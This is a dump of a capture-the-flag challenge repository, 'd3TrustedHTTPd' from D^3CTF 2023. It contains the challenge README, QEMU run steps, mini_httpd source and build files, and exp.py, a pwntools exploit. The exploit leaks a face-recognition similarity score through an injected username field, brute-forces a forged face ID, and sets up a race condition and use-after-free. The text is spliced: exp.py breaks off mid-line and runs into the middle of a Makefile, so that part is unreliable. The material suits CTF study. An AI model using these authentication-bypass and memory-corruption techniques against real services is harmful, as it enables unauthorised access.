├── README.md ├── attachment ├── Image ├── README.md ├── bl1.bin ├── bl2.bin ├── bl31.bin ├── bl32.bin ├── bl32_extra1.bin ├── bl32_extra2.bin ├── bl33.bin ├── rootfs.cpio.gz └── run.sh ├── exp.py ├── src └── d3_trusted_core │ ├── Android.mk │ ├── CMakeLists.txt │ ├── Makefile │ ├── host │ ├── Makefile │ └── main.c │ ├── mini_httpd-1.30 │ ├── .vscode │ │ └── settings.json │ ├── FILES │ ├── Makefile │ ├── Makefile.bak │ ├── README │ ├── contrib │ │ └── redhat-rpm │ │ │ ├── mini_httpd.init │ │ │ └── mini_httpd.spec │ ├── htpasswd.1 │ ├── htpasswd.c │ ├── index.html │ ├── match.c │ ├── match.h │ ├── mime_encodings.txt │ ├── mime_types.txt │ ├── mini_httpd.8 │ ├── mini_httpd.c │ ├── mini_httpd.cnf │ ├── port.h │ ├── scripts │ │ ├── 500.mini_httpd-rotate │ │ ├── mini_httpd.sh │ │ └── mini_httpd_wrapper │ ├── tdate_parse.c │ ├── tdate_parse.h │ ├── version.h │ └── www │ │ ├── bootstrap-treeview.min.css │ │ ├── bootstrap-treeview.min.js │ │ ├── index.html │ │ ├── login.html │ │ ├── manager.html │ │ ├── secfs.html │ │ └── weights │ │ ├── age_gender_model-shard1 │ │ ├── age_gender_model-weights_manifest.json │ │ ├── face_expression_model-shard1 │ │ ├── face_expression_model-weights_manifest.json │ │ ├── face_landmark_68_model-shard1 │ │ ├── face_landmark_68_model-weights_manifest.json │ │ ├── face_landmark_68_tiny_model-shard1 │ │ ├── face_landmark_68_tiny_model-weights_manifest.json │ │ ├── face_recognition_model-shard1 │ │ ├── face_recognition_model-shard2 │ │ ├── face_recognition_model-weights_manifest.json │ │ ├── mtcnn_model-shard1 │ │ ├── mtcnn_model-weights_manifest.json │ │ ├── ssd_mobilenetv1_model-shard1 │ │ ├── ssd_mobilenetv1_model-shard2 │ │ ├── ssd_mobilenetv1_model-weights_manifest.json │ │ ├── tiny_face_detector_model-shard1 │ │ └── tiny_face_detector_model-weights_manifest.json │ └── ta │ ├── Android.mk │ ├── Makefile │ ├── d3_trusted_core.c │ ├── include │ └── d3_trusted_core_ta.h │ ├── sub.mk │ └── user_ta_header_defines.h └── writeup en-US.md /README.md: -------------------------------------------------------------------------------- 1 | # d3TrustedHTTPd 2 | 3 | Trust me or not, you will never be able to break it~ 4 | 5 | Address: `http://{ip}:{port}/` 6 | 7 | Author: Eqqie @ D^3CTF 8 | 9 | # Writeup 10 | 11 | [writeup en-US](https://github.com/yikesoftware/d3ctf-2022-pwn-d3TrustedHTTPd/blob/main/writeup%20en-US.md) 12 | -------------------------------------------------------------------------------- /attachment/Image: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yikesoftware/d3ctf-2023-pwn-d3TrustedHTTPd/ef299929f1ebd624645617986011bd1294b3c269/attachment/Image -------------------------------------------------------------------------------- /attachment/README.md: -------------------------------------------------------------------------------- 1 | # d3TrustedHttpd 2 | 3 | ## Desc 4 | 5 | Trust me or not, you will never be able to break it. 6 | 7 | Address: `http://{ip}:{port}/` 8 | 9 | ## Run 10 | 11 | 1. Download and build QEMU 7.2.0: 12 | 13 | ```shell 14 | wget https://download.qemu.org/qemu-7.2.0.tar.xz 15 | tar xvJf qemu-7.2.0.tar.xz 16 | cd qemu-7.2.0 17 | ./configure --target-list=aarch64-softmmu --enable-slirp --disable-spice-protocol 18 | make -j `nproc` 19 | # make install 20 | ``` 21 | 22 | 2. Run QEMU with `./run.sh`. 23 | 24 | 3. Access challenge from `http://localhost:8080`. 25 | 26 | ## Notice 27 | 28 | 1. Some of the sensitive data embedded in the firmware is different from the remote, so please check through the remote environment. 29 | 30 | 2. Please destroy and re-create a new environment at the competition platform, if the key service is abnormal. 31 | 32 | 3. Please do not launch any kind of DDoS attack except for the interaction needed to complete the challange. 33 | 34 | 4. If you have other questions please ask for help in the online group. 35 | 36 | ## Author 37 | 38 | Eqqie @ D^3CTF 39 | -------------------------------------------------------------------------------- /attachment/bl1.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yikesoftware/d3ctf-2023-pwn-d3TrustedHTTPd/ef299929f1ebd624645617986011bd1294b3c269/attachment/bl1.bin -------------------------------------------------------------------------------- /attachment/bl2.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yikesoftware/d3ctf-2023-pwn-d3TrustedHTTPd/ef299929f1ebd624645617986011bd1294b3c269/attachment/bl2.bin -------------------------------------------------------------------------------- /attachment/bl31.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yikesoftware/d3ctf-2023-pwn-d3TrustedHTTPd/ef299929f1ebd624645617986011bd1294b3c269/attachment/bl31.bin -------------------------------------------------------------------------------- /attachment/bl32.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yikesoftware/d3ctf-2023-pwn-d3TrustedHTTPd/ef299929f1ebd624645617986011bd1294b3c269/attachment/bl32.bin -------------------------------------------------------------------------------- /attachment/bl32_extra1.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yikesoftware/d3ctf-2023-pwn-d3TrustedHTTPd/ef299929f1ebd624645617986011bd1294b3c269/attachment/bl32_extra1.bin -------------------------------------------------------------------------------- /attachment/bl32_extra2.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yikesoftware/d3ctf-2023-pwn-d3TrustedHTTPd/ef299929f1ebd624645617986011bd1294b3c269/attachment/bl32_extra2.bin -------------------------------------------------------------------------------- /attachment/bl33.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yikesoftware/d3ctf-2023-pwn-d3TrustedHTTPd/ef299929f1ebd624645617986011bd1294b3c269/attachment/bl33.bin -------------------------------------------------------------------------------- /attachment/rootfs.cpio.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yikesoftware/d3ctf-2023-pwn-d3TrustedHTTPd/ef299929f1ebd624645617986011bd1294b3c269/attachment/rootfs.cpio.gz -------------------------------------------------------------------------------- /attachment/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | qemu-system-aarch64 \ 4 | -nographic \ 5 | -smp 2 \ 6 | -monitor /dev/null \ 7 | -machine virt,secure=on,mte=off,gic-version=3,virtualization=false \ 8 | -cpu max,pauth-impdef=on \ 9 | -semihosting-config enable=on,target=native \ 10 | -m 1057 \ 11 | -bios bl1.bin \ 12 | -initrd ./rootfs.cpio.gz \ 13 | -kernel ./Image -no-acpi \ 14 | -append 'console=ttyAMA0,38400 keep_bootcon root=/dev/vda2' \ 15 | -object rng-random,filename=/dev/urandom,id=rng0 \ 16 | -device virtio-rng-pci,rng=rng0,max-bytes=1024,period=1000 \ 17 | -net user,hostfwd=tcp::8080-:8080 -net nic \ 18 | -no-reboot 19 | -------------------------------------------------------------------------------- /exp.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | from urllib.parse import urlencode, quote 3 | import threading 4 | import sys 5 | import json 6 | import struct 7 | import os 8 | import time 9 | 10 | context.arch = "aarch64" 11 | context.log_level = "debug" 12 | 13 | if len(sys.argv) != 3: 14 | print("python3 exp.py ip port") 15 | ip = sys.argv[1] 16 | port = int(sys.argv[2]) 17 | 18 | def get_conn(): 19 | return remote(ip, port) 20 | 21 | def make_post_request(path, body, session_id=None): 22 | if isinstance(session_id, str): 23 | session_id = session_id.encode() 24 | if isinstance(body, str): 25 | body = body.encode() 26 | p = get_conn() 27 | req = b"POST " + path.encode() + b" HTTP/1.1\r\n" 28 | req += b"Content-Length: "+ str(len(body)).encode() + b"\r\n" 29 | if session_id: 30 | req += b"Cookie: session_id="+ session_id + b";\r\n" 31 | req += b"\r\n" 32 | req += body 33 | p.send(req) 34 | return p 35 | 36 | def leak_similarity(face_data:list): 37 | done = 0 38 | similarity = 0.0 39 | while(done == 0): 40 | try: 41 | body = f"auth_mode=face_id&username=eqqie%09get_similarity&face_data={str(face_data)}".encode() 42 | p = make_post_request("/api/login", body) 43 | p.recvuntil(b"HTTP/1.1 ") 44 | if(p.recv(3) == b"400"): 45 | print("Try leak again...") 46 | p.close() 47 | done = 0 48 | continue 49 | p.recvuntil(b"session_id=") 50 | leak = p.recvuntil(b"; ", drop=True).decode() 51 | p.close() 52 | similarity = float(leak) 53 | done = 1 54 | except KeyboardInterrupt: 55 | print("KeyboardInterrupt") 56 | sys.exit(0) 57 | except Exception as e: 58 | print("leak error:", e) 59 | p.close() 60 | return similarity 61 | 62 | def login_by_face(face_data:list): 63 | args = { 64 | "auth_mode": "face_id", 65 | "username": "eqqie", 66 | "face_data": str(face_data) 67 | } 68 | body = urlencode(args).encode() 69 | p = make_post_request("/api/login", body) 70 | p.recvuntil(b"session_id=") 71 | session_id = p.recvuntil(b"; Path", drop=True).decode() 72 | p.close() 73 | return session_id 74 | 75 | def login_by_passwd(username, password): 76 | args = { 77 | "auth_mode": "passwd", 78 | "username": username, 79 | "password": password 80 | } 81 | body = urlencode(args).encode() 82 | try: 83 | p = make_post_request("/api/login", body) 84 | p.recvuntil(b"session_id=") 85 | session_id = p.recvuntil(b"; Path", drop=True).decode() 86 | p.close() 87 | except: 88 | print("no session!") 89 | session_id = None 90 | return session_id 91 | 92 | def disable_user(session_id, user): 93 | if isinstance(session_id, str): 94 | session_id = session_id.encode() 95 | args = { 96 | "username": user 97 | } 98 | body = urlencode(args).encode() 99 | p = make_post_request("/api/man/user/disable", body, session_id) 100 | p.recv() 101 | p.close() 102 | 103 | def enable_user(session_id, user): 104 | if isinstance(session_id, str): 105 | session_id = session_id.encode() 106 | args = { 107 | "username": user 108 | } 109 | body = urlencode(args).encode() 110 | p = make_post_request("/api/man/user/enable", body, session_id) 111 | p.recv() 112 | p.close() 113 | 114 | def reset_user(session_id, user, face_data=None): 115 | if isinstance(session_id, str): 116 | session_id = session_id.encode() 117 | if not face_data: 118 | args = { 119 | "username": user 120 | } 121 | else: 122 | args = { 123 | "username": user, 124 | "option": "set_face_id", 125 | "face_data": str(face_data) 126 | } 127 | body = urlencode(args).encode() 128 | p = make_post_request("/api/man/user/reset", body, session_id) 129 | p.recv() 130 | p.close() 131 | 132 | def test_race_resule(session_id): 133 | if isinstance(session_id, str): 134 | session_id = session_id.encode() 135 | p = make_post_request("/api/user", b"", session_id) 136 | p.recvuntil(b"HTTP/1.1 ") 137 | http_status = p.recv(3) 138 | p.close() 139 | if http_status == b"200": 140 | return 0 141 | elif http_status == b"403": 142 | remain = p.recv() 143 | if b"Disabled User" in remain: 144 | return 2 145 | else: 146 | return 1 147 | 148 | def user_info(session_id): 149 | if isinstance(session_id, str): 150 | session_id = session_id.encode() 151 | p = make_post_request("/api/user", b"", session_id) 152 | p.recvuntil(b"HTTP/1.1 ") 153 | http_status = p.recv(3) 154 | if http_status == b"200": 155 | try: 156 | p.recvuntil(b"Connection: close\r\n\r\n") 157 | p.close() 158 | json_data = p.recvall().decode() 159 | return json.loads(json_data) 160 | except: 161 | p.close() 162 | return None 163 | else: 164 | p.close() 165 | return None 166 | 167 | def secfs_file_man(action: str, session_id: str, **kwargs): 168 | print(f"[*] secfs_file_man: action [{action}] with args [{kwargs}]") 169 | if isinstance(session_id, str): 170 | session_id = session_id.encode() 171 | if action == "create": 172 | body = f"filename={kwargs['filename']}&data={kwargs['data']}&parent_id={kwargs['parent_id']}".encode() 173 | p = make_post_request("/api/secfs/file/create", body, session_id) 174 | p.recvuntil(b"\r\n\r\n") 175 | ret_data = p.recv() 176 | p.close() 177 | elif action == "delete": 178 | body = f"ext_id={kwargs['ext_id']}&del_mode={kwargs['del_mode']}".encode() 179 | p = make_post_request("/api/secfs/file/delete", body, session_id) 180 | p.recvuntil(b"\r\n\r\n") 181 | ret_data = p.recv() 182 | p.close() 183 | elif action == "info": 184 | body = f"ext_id={kwargs['ext_id']}".encode() 185 | p = make_post_request("/api/secfs/file/info", body, session_id) 186 | p.recvuntil(b"\r\n\r\n") 187 | ret_data = p.recv() 188 | p.close() 189 | elif action == "read": 190 | body = f"ext_id={kwargs['ext_id']}".encode() 191 | p = make_post_request("/api/secfs/file/read", body, session_id) 192 | ret_data = p.recv() 193 | p.close() 194 | elif action == "rename": 195 | body = f"ext_id={kwargs['ext_id']}&new_filename={kwargs['new_filename']}".encode() 196 | p = make_post_request("/api/secfs/file/rename", body, session_id) 197 | p.recvuntil(b"\r\n\r\n") 198 | ret_data = p.recv() 199 | p.close() 200 | elif action == "update": 201 | body = f"ext_id={kwargs['ext_id']}&data={kwargs['data']}".encode() 202 | p = make_post_request("/api/secfs/file/update", body, session_id) 203 | p.recvuntil(b"\r\n\r\n") 204 | ret_data = p.recv() 205 | p.close() 206 | elif action == "slots": 207 | p = make_post_request("/api/secfs/file/slots", b"", session_id) 208 | p.recvuntil(b"\r\n\r\n") 209 | ret_data = p.recv() 210 | p.close() 211 | else: 212 | return None 213 | return ret_data 214 | 215 | def secfs_dir_man(action: str, session_id: str, **kwargs): 216 | print(f"[*] secfs_dir_man: action [{action}] with args [{kwargs}]") 217 | if isinstance(session_id, str): 218 | session_id = session_id.encode() 219 | if action == "create": 220 | body = f"parent_id={kwargs['parent_id']}&dir_name={kwargs['dir_name']}".encode() 221 | p = make_post_request("/api/secfs/dir/create", body, session_id) 222 | p.recvuntil(b"\r\n\r\n") 223 | ret_data = p.recv() 224 | p.close() 225 | elif action == "delete": 226 | body = f"ext_id={kwargs['ext_id']}&rm_mode={kwargs['rm_mode']}".encode() 227 | p = make_post_request("/api/secfs/dir/delete", body, session_id) 228 | p.recvuntil(b"\r\n\r\n") 229 | ret_data = p.recv() 230 | p.close() 231 | elif action == "info": 232 | body = f"ext_id={kwargs['ext_id']}".encode() 233 | p = make_post_request("/api/secfs/dir/info", body, session_id) 234 | p.recvuntil(b"\r\n\r\n") 235 | ret_data = p.recv() 236 | p.close() 237 | else: 238 | return None 239 | return ret_data 240 | 241 | def forge_face_id(size:int): 242 | fake_face = [0.0 for _ in range(size)] 243 | rounds = 0 244 | total_max = 0.0 245 | delta = 0.025 246 | burp_range = 20 247 | while True: 248 | for i in range(size): 249 | local_max = 0.0 250 | max_index = 0 251 | for j in range(-burp_range, burp_range): 252 | rounds += 1 253 | fake_face[i] = j * delta 254 | print(fake_face) 255 | curr = leak_similarity(fake_face) 256 | if curr >= local_max: 257 | local_max = curr 258 | max_index = j 259 | else: 260 | break 261 | fake_face[i] = max_index * delta 262 | total_max = leak_similarity(fake_face) 263 | time.sleep(0.01) 264 | if total_max > 0.85: 265 | print("Success!") 266 | break 267 | else: 268 | print("Fail!") 269 | return None 270 | print(f"Final similarity = {total_max}, rounds = {rounds}") 271 | return fake_face 272 | 273 | 274 | class MyThread(threading.Thread): 275 | def __init__(self, func, args=()): 276 | super(MyThread, self).__init__() 277 | self.func = func 278 | self.args = args 279 | def run(self): 280 | self.result = self.func(*self.args) 281 | def get_result(self): 282 | threading.Thread.join(self) 283 | try: 284 | return self.result 285 | except Exception: 286 | return None 287 | 288 | def race_and_uaf(session_id): 289 | uaf_face_data = [1.0]*128 290 | uaf_face_data[88] = struct.unpack(" mime_encodings.h \ 32 | -e 's/#.*//' -e 's/[ ]*$$//' -e '/^$$/d' \ 33 | -e 's/[ ][ ]*/", 0, "/' -e 's/^/{ "/' -e 's/$$/", 0 },/' 34 | 35 | mime_types.h: mime_types.txt 36 | rm -f mime_types.h 37 | sed < mime_types.txt > mime_types.h \ 38 | -e 's/#.*//' -e 's/[ ]*$$//' -e '/^$$/d' \ 39 | -e 's/[ ][ ]*/", 0, "/' -e 's/^/{ "/' -e 's/$$/", 0 },/' 40 | 41 | 42 | htpasswd: htpasswd.o 43 | $(CC) $(LDFLAGS) htpasswd.o $(CRYPT_LIB) -o htpasswd 44 | 45 | htpasswd.o: htpasswd.c 46 | $(CC) $(CFLAGS) -c htpasswd.c 47 | 48 | 49 | cert: mini_httpd.pem 50 | mini_httpd.pem: mini_httpd.cnf 51 | openssl req -new -x509 -days 3650 -nodes -config mini_httpd.cnf -out mini_httpd.pem -keyout mini_httpd.pem 52 | openssl x509 -subject -dates -fingerprint -noout -in mini_httpd.pem 53 | chmod 600 mini_httpd.pem 54 | 55 | clean: 56 | rm -f mini_httpd mime_encodings.h mime_types.h htpasswd mini_httpd.rnd *.o core core.* *.core 57 | 58 | tar: 59 | @name=`sed -n -e '/#define SERVER_SOFTWARE /!d' -e 's,.*mini_httpd/,mini_httpd-,' -e 's, .*,,p' version.h` ; \ 60 | rm -rf $$name ; \ 61 | mkdir $$name ; \ 62 | tar cf - `cat FILES` | ( cd $$name ; tar xfBp - ) ; \ 63 | chmod 644 $$name/Makefile $$name/mime_encodings.txt $$name/mime_types.txt ; \ 64 | chmod 755 $$name/contrib $$name/contrib/redhat-rpm ; \ 65 | tar cf $$name.tar $$name ; \ 66 | rm -rf $$name ; \ 67 | gzip $$name.tar 68 | -------------------------------------------------------------------------------- /src/d3_trusted_core/mini_httpd-1.30/Makefile.bak: -------------------------------------------------------------------------------- 1 | # Makefile for mini_httpd 2 | 3 | # CONFIGURE: If you are using a SystemV-based operating system, such as 4 | # Solaris, you will need to uncomment this definition. 5 | #SYSV_LIBS = -lnsl -lsocket 6 | 7 | # CONFIGURE: Some systems don't need -lcrypt, and indeed they get an 8 | # error if you try to link with it. If you get an error about libcrypt 9 | # not found, try commenting out this definition. 10 | CRYPT_LIB = -lcrypt 11 | 12 | # CONFIGURE: If you want to compile in support for https, uncomment these 13 | # definitions. You will need to have already built OpenSSL, available at 14 | # http://www.openssl.org/ Make sure the SSL_TREE definition points to the 15 | # tree with your OpenSSL installation - depending on how you installed it, 16 | # it may be in /usr/local instead of /usr/local/ssl. 17 | #SSL_TREE = /usr/local/ssl 18 | #SSL_DEFS = -DUSE_SSL 19 | #SSL_INC = -I$(SSL_TREE)/include 20 | #SSL_LIBS = -L$(SSL_TREE)/lib -lssl -lcrypto 21 | 22 | 23 | BINDIR = /usr/local/sbin 24 | MANDIR = /usr/local/man 25 | #CC = cc 26 | CC = /home/eqqie/XDSEC/D3CTF/d3TrustedHttpd/optee_build/toolchains/aarch64/bin/aarch64-linux-gnu-gcc 27 | CDEFS = $(SSL_DEFS) $(SSL_INC) 28 | CFLAGS = -O $(CDEFS) -Wall -Wpointer-arith -Wshadow -Wcast-qual -Wcast-align -Wstrict-prototypes -Wmissing-prototypes -Wmissing-declarations -Wredundant-decls -Wno-long-long 29 | LDFLAGS = -s 30 | LDLIBS = $(CRYPT_LIB) $(SSL_LIBS) $(SYSV_LIBS) 31 | 32 | all: mini_httpd htpasswd 33 | 34 | mini_httpd: mini_httpd.o match.o tdate_parse.o 35 | $(CC) $(LDFLAGS) mini_httpd.o match.o tdate_parse.o $(LDLIBS) -o mini_httpd 36 | 37 | mini_httpd.o: mini_httpd.c version.h port.h match.h tdate_parse.h mime_encodings.h mime_types.h 38 | $(CC) $(CFLAGS) -c mini_httpd.c 39 | 40 | match.o: match.c match.h 41 | $(CC) $(CFLAGS) -c match.c 42 | 43 | tdate_parse.o: tdate_parse.c tdate_parse.h 44 | $(CC) $(CFLAGS) -c tdate_parse.c 45 | 46 | mime_encodings.h: mime_encodings.txt 47 | rm -f mime_encodings.h 48 | sed < mime_encodings.txt > mime_encodings.h \ 49 | -e 's/#.*//' -e 's/[ ]*$$//' -e '/^$$/d' \ 50 | -e 's/[ ][ ]*/", 0, "/' -e 's/^/{ "/' -e 's/$$/", 0 },/' 51 | 52 | mime_types.h: mime_types.txt 53 | rm -f mime_types.h 54 | sed < mime_types.txt > mime_types.h \ 55 | -e 's/#.*//' -e 's/[ ]*$$//' -e '/^$$/d' \ 56 | -e 's/[ ][ ]*/", 0, "/' -e 's/^/{ "/' -e 's/$$/", 0 },/' 57 | 58 | 59 | htpasswd: htpasswd.o 60 | $(CC) $(LDFLAGS) htpasswd.o $(CRYPT_LIB) -o htpasswd 61 | 62 | htpasswd.o: htpasswd.c 63 | $(CC) $(CFLAGS) -c htpasswd.c 64 | 65 | 66 | cert: mini_httpd.pem 67 | mini_httpd.pem: mini_httpd.cnf 68 | openssl req -new -x509 -days 3650 -nodes -config mini_httpd.cnf -out mini_httpd.pem -keyout mini_httpd.pem 69 | openssl x509 -subject -dates -fingerprint -noout -in mini_httpd.pem 70 | chmod 600 mini_httpd.pem 71 | 72 | 73 | install: all 74 | rm -f $(BINDIR)/mini_httpd $(BINDIR)/htpasswd 75 | -mkdir -p $(BINDIR) 76 | cp mini_httpd htpasswd $(BINDIR) 77 | rm -f $(MANDIR)/man8/mini_httpd.8 $(MANDIR)/man1/htpasswd.1 78 | -mkdir -p $(MANDIR)/man8 79 | cp mini_httpd.8 $(MANDIR)/man8 80 | -mkdir -p $(MANDIR)/man1 81 | cp htpasswd.1 $(MANDIR)/man1 82 | 83 | clean: 84 | rm -f mini_httpd mime_encodings.h mime_types.h htpasswd mini_httpd.rnd *.o core core.* *.core 85 | 86 | tar: 87 | @name=`sed -n -e '/#define SERVER_SOFTWARE /!d' -e 's,.*mini_httpd/,mini_httpd-,' -e 's, .*,,p' version.h` ; \ 88 | rm -rf $$name ; \ 89 | mkdir $$name ; \ 90 | tar cf - `cat FILES` | ( cd $$name ; tar xfBp - ) ; \ 91 | chmod 644 $$name/Makefile $$name/mime_encodings.txt $$name/mime_types.txt ; \ 92 | chmod 755 $$name/contrib $$name/contrib/redhat-rpm ; \ 93 | tar cf $$name.tar $$name ; \ 94 | rm -rf $$name ; \ 95 | gzip $$name.tar 96 | -------------------------------------------------------------------------------- /src/d3_trusted_core/mini_httpd-1.30/README: -------------------------------------------------------------------------------- 1 | mini_httpd - small HTTP server 2 | version 1.30 of 26Oct2018 3 | 4 | mini_httpd is a small HTTP server. Its performance is not great, but for 5 | low or medium traffic sites it's quite adequate. It implements all the 6 | basic features of an HTTP server, including: 7 | 8 | * GET, HEAD, and POST methods. 9 | * CGI. 10 | * Basic authentication. 11 | * Security against ".." filename snooping. 12 | * The common MIME types. 13 | * Trailing-slash redirection. 14 | * index.html, index.htm, index.cgi 15 | * Directory listings. 16 | * Multihoming / virtual hosting. 17 | * Standard logging. 18 | * Custom error pages. 19 | 20 | It can also be configured to do SSL/HTTPS. 21 | 22 | mini_httpd was written for a couple reasons. One, as an experiment 23 | to see just how slow an old-fashioned forking web server would be 24 | with today's operating systems. The answer is, surprisingly, not 25 | that slow - on FreeBSD 3.2, mini_httpd benchmarks at about 90% the 26 | speed of Apache. The other main reason for writing mini_httpd was 27 | to get a simple platform for experimenting with new web server 28 | technology, for instance SSL. 29 | 30 | See the manual entry for more details. 31 | 32 | Files in this distribution: 33 | 34 | README this 35 | Makefile guess 36 | mini_httpd.c source file for server 37 | mini_httpd.8 manual entry for server 38 | version.h version defines 39 | port.h portability defines 40 | mime_types.txt list of MIME types 41 | htpasswd.c source file for password changer 42 | htpasswd.1 manual entry for password changer 43 | index.html sample index file 44 | 45 | To build: If you're on a SysV-like machine (which includes old Linux systems 46 | but not new Linux systems), edit the Makefile and uncomment the SYSVLIBS line. 47 | If you're doing SSL, uncomment those lines too. Otherwise, just do a make. 48 | 49 | On Red Hat Linux systems you can use RPM to install mini_httpd, like so: 50 | cd /usr/src/redhat/SOURCES 51 | wget http://www.acme.com/software/mini_httpd/mini_httpd-1.30.tar.gz 52 | rpm -ta mini_httpd-1.30.tar.gz 53 | rpm -i /usr/src/redhat/RPMS/i386/mini_httpd-1.30-1.i386.rpm 54 | 55 | Feedback is welcome - send bug reports, enhancements, checks, money 56 | orders, etc. to the addresses below. 57 | 58 | Jef Poskanzer jef@mail.acme.com http://www.acme.com/jef/ 59 | -------------------------------------------------------------------------------- /src/d3_trusted_core/mini_httpd-1.30/contrib/redhat-rpm/mini_httpd.init: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # mini_httpd startup script 3 | # Nelson Minar Thu Dec 30 13:54:31 PST 1999 4 | # the following two lines added 2000-01-31 by Bennett Todd 5 | # chkconfig: 2345 99 01 6 | # description: control script for mini_httpd 7 | 8 | 9 | # configuration options: 10 | 11 | DOCROOT=/home/httpd/html 12 | LOGFILE=/var/log/httpd/mini_httpd 13 | PIDFILE=/var/run/mini_httpd.pid 14 | HTTPD=/usr/bin/mini_httpd 15 | 16 | . /etc/rc.d/init.d/functions 17 | 18 | case "$1" in 19 | start) 20 | if [ ! -d $DOCROOT ]; then 21 | echo "mini_httpd: $DOCROOT does not exist." 22 | exit 1; 23 | fi 24 | cd $DOCROOT 25 | action "Starting mini_httpd" $HTTPD -l $LOGFILE -i $PIDFILE; 26 | touch /var/lock/subsys/httpd 27 | ;; 28 | 29 | stop) 30 | echo -n "Stopping mini_httpd " 31 | killproc mini_httpd 32 | echo 33 | rm -f /var/lock/subsys/httpd $PIDFILE 34 | ;; 35 | 36 | status) 37 | status mini_httpd 38 | ;; 39 | 40 | restart|reload) 41 | $0 stop 42 | $0 start 43 | ;; 44 | 45 | *) 46 | echo "Usage: mini_httpd {start|stop|status|restart|reload}" 47 | ;; 48 | esac 49 | 50 | exit 0 51 | -------------------------------------------------------------------------------- /src/d3_trusted_core/mini_httpd-1.30/contrib/redhat-rpm/mini_httpd.spec: -------------------------------------------------------------------------------- 1 | Summary: small, simple http daemon, supports SSL 2 | Name: mini_httpd 3 | Version: 1.30 4 | Release: 1 5 | Copyright: Freely Redistributable 6 | Packager: Bennett Todd 7 | Group: Networking/Daemons 8 | URL: http://www.acme.com/software/mini_httpd/ 9 | Source: http://www.acme.com/software/mini_httpd-%{PACKAGE_VERSION}.tar.gz 10 | BuildRoot: /var/tmp/mini_httpd-rpmbuild 11 | Requires: openssl 12 | %description 13 | 14 | Simple and small HTTP daemon supporting SSL 15 | 16 | %prep 17 | %setup 18 | 19 | %build 20 | make SSL_INCDIR=/usr/include/openssl \ 21 | SSL_LIBDIR=/usr/lib \ 22 | SSL_DEFS=-DUSE_SSL \ 23 | SSL_INC=-I/usr/include/openssl \ 24 | SSL_LIBS='-lssl -lcrypto' \ 25 | BINDIR=/usr/bin \ 26 | MANDIR=/usr/man \ 27 | CFLAGS='-g -DUSE_SSL -I/usr/include/openssl' 28 | 29 | %install 30 | mkdir -p $RPM_BUILD_ROOT/etc/rc.d/init.d 31 | mkdir -p $RPM_BUILD_ROOT/usr/bin 32 | mkdir -p $RPM_BUILD_ROOT/usr/man/man1 33 | mkdir -p $RPM_BUILD_ROOT/usr/man/man8 34 | mkdir -p $RPM_BUILD_ROOT/home/httpd/html 35 | make BINDIR=$RPM_BUILD_ROOT/usr/bin \ 36 | MANDIR=$RPM_BUILD_ROOT/usr/man \ 37 | install 38 | install index.html $RPM_BUILD_ROOT/home/httpd/html 39 | install contrib/redhat-rpm/mini_httpd.init \ 40 | $RPM_BUILD_ROOT/etc/rc.d/init.d/mini_httpd 41 | 42 | %post 43 | /sbin/chkconfig mini_httpd reset 44 | 45 | %preun 46 | /etc/rc.d/init.d/mini_httpd stop 47 | /sbin/chkconfig --level 0123456 mini_httpd off 48 | 49 | %files 50 | %defattr(-,root,root) 51 | 52 | /usr/bin/* 53 | /home/httpd/html/index.html 54 | %attr(0755,root,root) /etc/rc.d/init.d/mini_httpd 55 | %doc /usr/man/*/* 56 | %doc [A-Z]* 57 | 58 | 59 | %changelog 60 | * Sat Oct 18 2014 Version 1.21 61 | * Thu Jan 08 2004 Version 1.20 62 | * Mon Oct 27 2003 Version 1.19 63 | * Sat Sep 13 2003 Version 1.18 64 | * Sat May 25 2002 Version 1.17 65 | * Mon May 07 2001 Version 1.16 66 | * Tue May 01 2001 Version 1.15c 67 | * Sat Apr 21 2001 Version 1.15b 68 | * Wed Sep 20 2000 Version 1.15 69 | * Thu Jun 15 2000 Version 1.14 70 | * Fri May 26 2000 Version 1.13 71 | * Wed Mar 01 2000 Version 1.12 72 | * Sun Feb 06 2000 Version 1.11 73 | * Wed Feb 02 2000 Version 1.10 74 | * Mon Jan 31 2000 Version 1.09, added init script 75 | * Wed Jan 19 2000 Version 1.08, reset release to 1 76 | * Mon Dec 13 1999 77 | - Added defattr to %files, bumped Release to 2 78 | * Sat Dec 11 1999 79 | - Bumped version to 19991210, switched source from oct to dec 80 | * Fri Dec 10 1999 81 | - Initial Wrap 82 | -------------------------------------------------------------------------------- /src/d3_trusted_core/mini_httpd-1.30/htpasswd.1: -------------------------------------------------------------------------------- 1 | .TH htpasswd 1 "05 May 1998" 2 | .SH NAME 3 | htpasswd - manipulate HTTP-server password files 4 | .SH SYNOPSIS 5 | .B htpasswd 6 | .RB [ -c ] 7 | .I passwordfile 8 | .I username 9 | .SH DESCRIPTION 10 | .PP 11 | Sets a user's password in an httpd-style password file. 12 | The -c flag creates a new file. 13 | .SH AUTHOR 14 | Rob McCool. 15 | Modified 29aug97 by Jef Poskanzer to accept new password on stdin, 16 | if stdin is a pipe or file. This is necessary for use from CGI. 17 | -------------------------------------------------------------------------------- /src/d3_trusted_core/mini_httpd-1.30/htpasswd.c: -------------------------------------------------------------------------------- 1 | /* 2 | * htpasswd.c: simple program for manipulating password file for NCSA httpd 3 | * 4 | * Rob McCool 5 | */ 6 | 7 | /* Modified 29aug97 by Jef Poskanzer to accept new password on stdin, 8 | ** if stdin is a pipe or file. This is necessary for use from CGI. 9 | */ 10 | 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | 19 | #define LF 10 20 | #define CR 13 21 | 22 | #define MAX_STRING_LEN 256 23 | 24 | int tfd; 25 | char temp_template[] = "/tmp/htp.XXXXXX"; 26 | 27 | void interrupted(int); 28 | 29 | static char * strd(char *s) { 30 | char *d; 31 | 32 | d=(char *)malloc(strlen(s) + 1); 33 | strcpy(d,s); 34 | return(d); 35 | } 36 | 37 | static void getword(char *word, char *line, char stop) { 38 | int x = 0,y; 39 | 40 | for(x=0;((line[x]) && (line[x] != stop));x++) 41 | word[x] = 